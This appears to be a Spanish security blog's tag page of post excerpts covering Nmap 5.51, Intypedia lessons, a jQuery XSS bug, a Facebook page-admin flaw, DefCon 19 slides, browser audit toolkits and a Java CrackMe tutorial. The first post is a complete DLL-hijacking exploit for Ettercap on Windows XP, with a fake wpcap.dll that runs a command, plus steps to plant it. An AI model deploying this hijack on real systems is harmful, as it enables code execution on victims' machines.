¡La Informática al límite!
Entradas etiquetadas con seguridad
Ettercap NG-0.7.3 DLL Exploit
8 abr
---------------------------------------------------------------------- Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Autor: $ slashdot Testeado: Windows XP SP3 Extensión Vulnerable: .pcap ---------------------------------------------------------------------- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description() { evil(); } DLLIMPORT void pcap_dump() { evil(); } DLLIMPORT void pcap_dump_close() { evil(); } DLLIMPORT void pcap_dump_open() { evil(); } DLLIMPORT void pcap_file() { evil(); } DLLIMPORT void pcap_freecode() { evil(); } DLLIMPORT void pcap_geterr() { evil(); } DLLIMPORT void pcap_getevent() { evil(); } DLLIMPORT void pcap_lib_version() { evil(); } DLLIMPORT void pcap_lookupdev() { evil(); } DLLIMPORT void pcap_lookupnet() { evil(); } DLLIMPORT void pcap_loop() { evil(); } DLLIMPORT void pcap_open_live() { evil(); } DLLIMPORT void pcap_open_offline() { evil(); } DLLIMPORT void pcap_setfilter() { evil(); } DLLIMPORT void pcap_snapshot() { evil(); } DLLIMPORT void pcap_stats() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }
Compilar y renombrar a wpcap.dll, crear en el mismo directorio que el archivo .pcap
¡Lanzado el Nmap 5.51!
6 dic
Hace poco salió la ultima versión de Nmap, una de las herramientas que cualquier persona interesada por la seguridad informática debe conocer y utilizar.
Algunas de las mejoras en la versión 5.51
- Soporte para el protocolo Gopher
- Añadidos 177 NSE scripts
- 2,982 OS fingerprints añadidos
- 7,319 firmas de versiones agregadas
- Inclusión de la nueva herramienta NCAT y NPING
- Añadida la herramienta de comparación de escaneos Ndiff
- Mejora del rendimiento (notablemente)
- Nuevo motor Nmap Scripting Engine (NSE) nos permite escribir y compartir scripts que automaticen tareas.
IntyPedia: Enciclopedia visual de la seguridad de la información
6 dic
Intypedia es una enciclopedia visual de la seguridad de la información. El proyecto persigue difundir conocimientos sobre esta temática mediante lecciones en vídeo desarrolladas por destacados expertos usando un lenguaje accesible por un amplio público. La enciclopedia abarca temas como la criptografía, la seguridad en redes, el malware, la seguridad web, entre otros.
Las lecciones publicadas hasta el momento son:
- Lección 1. Historia de la criptografía y su desarrollo en Europa
- Lección 2. Sistemas de cifra con clave secreta
- Lección 3. Sistemas de cifra con clave pública
- Lección 4. Introducción a la seguridad en redes telemáticas
- Lección 5. Seguridad perimetral
- Lección 6. Introducción malware
- Lección 7. Seguridad en aplicaciones web
- Lección 8. Protocolo de reparto de secretos
- Lección 9. Introducción al protocolo SSL
- Lección 10. Ataques al protocolo SSL
- Lección 11. Análisis y gestión de riesgos
- Lección 12. Seguridad en redes WiFi
Cross Site Scripting en jQuery 1.6
10 sep
Se ha arreglado una vulnerabilidad que permitía realizar ataques Cross Site Scripting (XSS) en jQuery 1.6. La vulnerabilidad podía ser explotada en ciertos sitios que utilizaran la variable ‘location.hash’ en un contexto que no fuera el de Cascading Style Sheets (CSS).
jQuery es una biblioteca o framework javascript de software libre y código abierto. Es compatible con la mayoría de navegadores actuales y ofrece una serie de funcionalidades basadas en javascript que de otra manera requerirían muchas líneas de código. Así, permite simplificar la manera de interactuar con los documentos HTML, manipular el árbol DOM, manejar eventos, desarrollar animaciones y agregar interacción con la técnica AJAX a páginas web.
El error se produce cuando se introduce el símbolo ‘#’ en la URL seguido del código que se desee inyectar, puesto que jQuery espera (erróneamente) que la cadena que se va a encontrar a continuación sea código CSS. Debido a esto no realizan las comprobaciones necesarias para limpiar el contenido de la variable ‘location.hash’. Al parecer es una costumbre bastante extendida en algunas webs, utilizar el contenido de esta variable para fines diferentes a los originales (para ser insertada en código CSS). Es el caso de evernote.com o skype.com, entre otras. Por esto, se ha optado en la Más >
Fallo en facebook que permite apropiación de páginas creadas
8 sep
El portal Naked Security ha detectado un fallo en el sistema de administración de las páginas de facebook, que podría comprometer la autoridad de los creadores originales.
Según el portal especializado en seguridad de Sophos, se ha demostrado un fallo en el sistema que permitiría a los usuarios elevados a administradores eliminar a los creadores originales de las páginas, contrariamente a lo que Facebook afirma en sus condiciones del servicio.
De esta forma, si el responsable de una página de Facebook decide ascender a un contacto para que sea administrador, podría ver como su contacto elimina sus privilegios.
El portal Naked Security asegura que esta práctica es posible y contradice las normas del servicio de Facebook. Citando una respuesta de Facebook FAQ, el portal asegura que en las condiciones de Facebook figura la cláusula: “El creador original de una página no podrá ser eliminado por otros administradores”.
Para demostrar el fallo del sistema, en Naked Security han publicado un vídeo en el que se puede ver todo el proceso y se comprueba el fallo descrito.
Presentaciones de la Defcon19 (2011)
19 ago
Fueron publicadas las presentaciones de la DefCon19. Están en inglés, obviamente, y algunas son bastante complejas si no estás en la explicación, pero de igual forma, encontrarás varias entretenidas.
¡Échale un vistazo!
File or Directory Name Size (Units) dc-19-program.pdf (19.01 MiB) DEFCON-19-Abstrct-The-Schemaverse-Guide.pdf (592.27 KiB) DEFCON-19-Abstrct-The-Schemaverse.pdf (993.54 KiB) DEFCON-19-Almeida-Workshop-ESD.pdf (1.85 MiB) DEFCON-19-Alonso-Garrido-DUST.pdf (1.78 MiB) DEFCON-19-Alonso-Garrido-Excel.pdf (458.22 KiB) DEFCON-19-Arlen-Nano-Seconds-WP.pdf (177.42 KiB) DEFCON-19-Arlen-Nano-Seconds.pdf (5.40 MiB) DEFCON-19-Arpaia-Reed-Beat-to-1337.pdf (99.74 KiB) DEFCON-19-Baldwin-DVCS-WP.pdf (102.23 KiB) DEFCON-19-Baldwin-DVCS.pdf (2.69 MiB) DEFCON-19-Barisani-Bianco-Laurie-Franken.pdf (2.01 MiB) DEFCON-19-Barnett-Deceptive-Hacking-WP.pdf (822.13 KiB) DEFCON-19-Barnett-Deceptive-Hacking.pdf (717.56 KiB) DEFCON-19-Bilodeau-FingerBank.pdf (214.22 KiB) DEFCON-19-Bilodeau-PacketFence.pdf (1005.30 KiB) DEFCON-19-Bouillon-Federation-and-Empire.pdf (19.63 MiB) DEFCON-19-Bowne-Three-Generations-of-DoS-Attacks.pdf (2.38 MiB) DEFCON-19-Brooks-Wilson-Traps-of-Gold.pdf (4.89 MiB) DEFCON-19-Bryner-Kinectasploit.pdf (1.07 MiB) DEFCON-19-Carey-Metasploit-vSploit-Modules.pdf (1.08 MiB) DEFCON-19-Chamales-Securing-Crisis-Maps.pdf (24.78 MiB) DEFCON-19-Chow-Abusing-HTML5.pdf (124.22 KiB) DEFCON-19-Conti-Security-Research.pdf (8.53 MiB) DEFCON-19-Cook-Kernel-Exploitation.pdf (564.81 KiB) DEFCON-19-Craig-Internet-Kiosk-Terminals.pdf (1.56 MiB) DEFCON-19-Crenshaw-Cipherspaces-Darknets.pdf (5.12 MiB) DEFCON-19-Crowley-Cryptographic-Oracles.pdf (5.49 MiB) DEFCON-19-Cryer-Taking-Your-Ball-and-Going-Home.pdf (5.58 MiB) DEFCON-19-DC-Groups-Panel.pdf (19.67 MiB) DEFCON-19-Devarajan-LeBert-VDLDS.pptx.pdf (298.56 KiB) DEFCON-19-Dinaburg-Bit-Squatting.pdf (11.86 MiB) DEFCON-19-Duckwall-Bridge-Too-Far.pdf (1.28 MiB) DEFCON-19-Elhage-Virtualization-Under-Attack.pdf (422.68 KiB) DEFCON-19-Elrod-Morris-Not-a-Doctor.pdf (297.53 KiB) DEFCON-19-Engebretson-Pauli-Pen-Testing.pdf (759.48 KiB) DEFCON-19-Fail-Panel.pdf (347.34 KiB) DEFCON-19-Feinstein-Jarmoc-Get-Off-of-My-Cloud.pdf (1.41 MiB) DEFCON-19-Foofus-Forceful-Browsing-WP.pdf (417.46 KiB) DEFCON-19-Fritschie-Witmer-F-On-the-River.pdf (2.76 MiB) DEFCON-19-Garcia-UPnP-Mapping-WP.pdf (252.99 KiB) DEFCON-19-Garcia-UPnP-Mapping.pdf (204.41 KiB) DEFCON-19-Gavin-OpenDLP.pdf (61.34 KiB) DEFCON-19-Geers-Strategic-Cyber-Security-WP.pdf (6.35 MiB) DEFCON-19-Geers-Strategic-Cyber-Security.pdf (1.57 MiB) DEFCON-19-Gomez-Bulletproofing-The-Cloud.pdf (17.52 MiB) DEFCON-19-Hamiel-Smartfuzzing_the_Web_DC.pdf (744.91 KiB) DEFCON-19-Havelt-Henrique.pdf (3.22 MiB) DEFCON-19-Heiland-Printer-To-Pwnd.pdf (2.09 MiB) DEFCON-19-Holt-Kilger-Assessing-Civilian-Willingness.pdf (248.35 KiB) DEFCON-19-Howard-Cyber-Security-Trends-WP.pdf (456.41 KiB) DEFCON-19-Howard-Cyber-Security-Trends.pdf (2.69 MiB) DEFCON-19-Imhoff-Password-Cracking.pdf (574.54 KiB) DEFCON-19-JackDaniel-PCI-2-PANEL.pdf (875.54 KiB) DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf (168.53 KiB) DEFCON-19-Kennedy-Pentesting-Over-Powerlines-2.pdf (1.17 MiB) DEFCON-19-Kennish-Tracking-the-Trackers.pdf (3.83 MiB) DEFCON-19-Kornbrust-Hacking-and-Securing-DB2.pdf (664.58 KiB) DEFCON-19-Kotler-Amit-Sounds-Like-Botnet.pdf (586.40 KiB) DEFCON-19-Krick-License-to-Transmit.pdf (11.74 MiB) DEFCON-19-Lai-Wu-Chiu-PK-APT-Secrets-2.pdf (12.48 MiB) DEFCON-19-Lenik-MAC(b)Daddy.pdf (753.41 KiB) DEFCON-19-Linn-PIG-Finding-Truffles.pdf (3.36 MiB) DEFCON-19-Maresca-FIPS-140.pdf (294.20 KiB) DEFCON-19-Marpet-Gostom-Smile-for-the-Grenade.pdf (7.68 MiB) DEFCON-19-McCoy-Hacking-Net.pdf (3.98 MiB) DEFCON-19-McGrew-Covert-WP.pdf (542.33 KiB) DEFCON-19-McGrew-Covert.pdf (2.44 MiB) DEFCON-19-McNabb-Vulns-Wireless-Water-Meter-Networks.pdf (2.62 MiB) DEFCON-19-Miller-Battery-Firmware-Hacking.pdf (43.52 MiB) DEFCON-19-O’Neil-Chin-Google-Android.pdf (4.85 MiB) DEFCON-19-Ocepek-Blinkie-Lights-Arduino.pdf (11.74 MiB) DEFCON-19-Ollam-Gun-Safes.pdf (27.28 MiB) DEFCON-19-Osborn-Johansen-Hacking-Google-Chrome-OS.pdf (9.45 KiB) DEFCON-19-Percoco-Spiderlabs-Droid.pdf (5.62 MiB) DEFCON-19-Percoco-Spiderlabs-Malware-Freakshow-3.pdf (3.81 MiB) DEFCON-19-Percoco-Spiderlabs-SSLizzard.pdf (4.45 MiB) DEFCON-19-Phillips-Hacking-MMORPGs.pdf (870.61 KiB) DEFCON-19-Pickett-Port-Scanning-Without-Packets.pdf (8.22 MiB) DEFCON-19-Pickett-Resources.pdf (24.66 KiB) DEFCON-19-Pittman-Password-Fail.pdf (2.52 MiB) DEFCON-19-Rezchikov-Wang-Engelman-Airport-Security-WP.pdf (344.67 KiB) DEFCON-19-Robinson-Time.pdf (1.36 MiB) Más >
KromCAT: Convierte Chrome en una herramienta de auditorías
24 jul
Hace algún tiempo os presenté Mantra. Un navegador basado en Mozilla Firefox y que se combinaba con el proyecto FireCAT para convertirlo en una potente herramienta para realizar auditorías de seguridad, pero como es mejor tener una lista de dónde elegir, hoy os vengo a presentar el proyecto KromCAT.
KromCAT es un conjunto de extensiones para el navegador Google Chrome especialmente diseñado para realizar auditorías de seguridad. Actualmente se encuentra en la versión 1.0 Beta y contiene más de 38 extensiones divididas en 7 categorías ( Ver imagen ).
Google lanza una herramienta para detectar vulnerabilidades en aplicaciones web
24 jun
Google ha lanzado una nueva herramienta denominada DOM Snitch destinada a desarrolladores que permite verificar si las aplicaciones web que han creado son vulnerables a ataques y ponen en peligro la seguridad de los usuarios de Chrome. La herramienta que lanza Google es una extensión de Chrome en fase experimental permite a los desarrolladores y testeadores “identificar las prácticas inseguras que se encuentran en el código del lado del cliente”.
DOM Snitch se une así a otras herramientas open source como Skipfish y Ratproxy que Google ofrece para comprobar la seguridad de aplicaciones web.
La nueva herramienta de Google, como elemento diferenciador, se puede utilizar en tiempo real, los desarrolladores pueden observar modificaciones DOM cuando ocurren dentro del navegador sin necesidad de desplazarse por el código JavaScript con un depurador o pausando la ejecución de su aplicación.
Por otro lado, según Google, es una herramienta fácil de usar, con las función de seguridad heurística y las vistas anidadas, tanto a los desarrolladores avanzados como los menos expertos pueden detectar áreas de la aplicación que se está probando que necesitan más atención de forma rápida.
Además, con esta herramienta será posible compartir experiencias, permite a los desarrolladores exportar y compartir fácilmente capturado modificaciones DOM, “para resolver Más >
Mantra: navegador para auditorías de seguridad
23 jun
Mantra es un navegador cuyo objetivo es ser una herramienta primordial para las auditorías de seguridad. Está basado en Mozilla Firefox, y es una compilación personalizada, de versión portable, fácil uso y totalmente configurable. Se encuentra disponible para los sistemas operativos GNU/Linux, Windows y MacOS.
En su versión actual, han decidido unir su proyecto con FireCAT, el cual es un conjunto de extensiones clasificadas y bien organizadas sobre auditoría en seguridad.
Ahora Mantra cuenta con las siguientes herramientas:
- Information Gathering
- Whois
- Flagfox
- Location Info
- Flagfox
- Enumeration and Fingerprint
- Host Spy
- JSView
- PassiveRecon
- View Dependencies
- Wappalyzer
- Data Mining
- People Search Engine
- Facebook search
- Whois
- Editors
- Cert Viewer Plus
- Firebug
- JSView
- Network Utilities
- Protocols and applications
- FTP
- Fire FTP
- DNS
- DNS Cache
- SQL
- SQLite Manager
- FTP
- Sniffers
- HTTP Fox
- Password
- CryptoFox 2.0
- Protocols and applications
- Misc
- Tweaks and Hacks
- Greasemonkey
- Scripts
- Malware scanner
- Web of Trust
- Automation
- iMacros
- Others
- CacheToggle 0.6
- URL Flipper
- Tweaks and Hacks
- Application Auditing
- Hackbar
- JavaScript Deobfuscator
- RESTClient
- Tamper Data
- Live HTTP Headers
- RefControl
- User Agent Switcher
- Web Developer
- DOM Inspector
- Inspect This
- Formfox
- Exploit Me
- Access Me
- SQL Inject Me
- XSS Me
- Cookies
- Cookies Manager+ 1.5.1
- Firecookie
- Proxy
- FoxyProxy Standard 2.22.6
- HttpFox
Para obtener más información puedes visitar la página oficial de Mantra.
Más >
Resolviendo CrackMe en Java
5 jul
En el foro RTHacker, un usuario posteó un CrackMe hecho en Java, realmente muy sencillo, pero interesante. Mirándolo un poco, me animé a crear un pequeño tutorial de cómo resolverlo. Es ideal para que los que recién empiezan en la Ingenieria Inversa practiquen.
Éste es el CrackMe, ahora vamos a descargarlo. Recuerden que éste es un archivo .JAR, por lo cual necesitaran la máquina virtual de Java para poder ejecutar la aplicación correctamente (Puedes descargarla de aquí).
Hechos los pasos anteriores, ejecutaremos por primera vez la aplicación y analizaremos su estructura. Por lógica e instinto, lo primero que haremos es probar una contraseña al azar para ver qué reacción nos devuelve.
¡Perfecto!, el CrackMe devuelve un mensaje de error con el texto «Incorrecto!». Ahora, lo que debemos de hacer es encontrar en el archivo esa palabra, para ello lo abriremos con un editor Hexadecimal (En mi caso usaré el Bless Hex Editor).
Mirando un poco las entrañas de éste fichero, puedo encontrar que contiene tres archivos clase llamados:
probarActionPerformed.class Pruebas.class Pruebas$1.class
Tal vez se estén preguntando, ¿cómo accedemos a ellos?…Pues la respuesta es sencilla, los ficheros .JAR también son formatos de compresión de datos, como .ZIP, .RAR, entre otros. Así que tecleando éste comando en terminal podremos obtenerlos fácilmente:
windhack@windhack-desktop:~/Escritorio$ jar Más >
